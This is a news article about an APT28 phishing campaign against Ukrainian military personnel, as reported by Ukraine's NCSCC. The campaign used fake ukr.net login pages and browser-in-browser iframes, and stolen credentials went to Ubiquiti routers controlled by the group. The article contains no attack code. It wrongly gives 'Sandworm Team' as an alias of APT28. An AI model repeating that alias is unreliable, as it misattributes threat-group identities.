Share this article on:
A new phishing campaign targeting Ukrainian military personnel has been launched by a Russian state-sponsored hacking group.
The Ukrainian National Cyber Security Coordination Centre (NCSCC) has issued a warning to its military personnel, telling them to be cautious of the phishing campaign.
“Amidst the lack of success on the battlefield, Russia is stepping up its cyber espionage efforts and continuing to try to gain access to Ukraine‘s military situational awareness and command and control systems by stealing military personnel‘s credentials,” said the NCSCC in a statement on Linkedin.
The threat group in question is APT28 (also known as Fancy Bear or Sandworm Team), a Russian threat group that is affiliated with the Main Directorate of the General Staff of the Russian Military (GRU).
The phishing campaign was first discovered by the NCSCC on 19 January after it noted a number of emails that sent users to a fake login page.
🚨 russian group APT28 conducts phishing attacks against Ukrainian military personnel.#APT28 is distributing phishing html pages of the ukr[.]net mail service and is aimed at gaining access to the mailboxes of military personnel and units of the Ukrainian Defence Forces. pic.twitter.com/eQiWz5HGNO
— НКЦК (@ncsccUA) January 27, 2024
The NCSCC said the threat group has released a number of variants that encourage staff to reveal their credentials.
“One of the variants includes a page that imitates the military operational information as of 06.00 on 19 January 2024 regarding the Russian invasion,” the NCSCC added.
“When the page is opened, a field for entering ukr[.]net credentials is displayed to allegedly ‘confirm access’, from where the credentials will be sent to a server controlled by the group.
“In another variant, a document is distributed with allegedly detailed information about the activity of the ukr[.]net account.
“When clicking on the «Change password» button on the HTML page, a browser-in-browser attack is launched and a special iframe with a fake page for entering ukr[.]net credentials is embedded.”
The NCSCC said that in both cases, credentials are pulled to a Ubiquiti Edge router controlled by APT28, a common practice for the threat group.
The IT Army of Ukraine, a cyber warfare organisation created after the government called on its nation’s hackers following the Russian invasion in February 2022, has also issued a warning on its Telegram channel.
APT28 has been active for a long time now, having been established in 2004 and connected to the 95th Main Special Service Centre (GTsSS) military unit 26165, according to Cybernews citing Mitre Att&ck.
The group is thought to have interfered with US presidential elections, including the Hillary Clinton campaign in 2016, when it is believed to have attacked the US Congressional Campaign Committee and the Democratic National Committee.
For this, five members of GRU 26165 were charged by the FBI in 2018 for the infiltration of the US, as well as the World Anti-Doping Agencies and other major targets.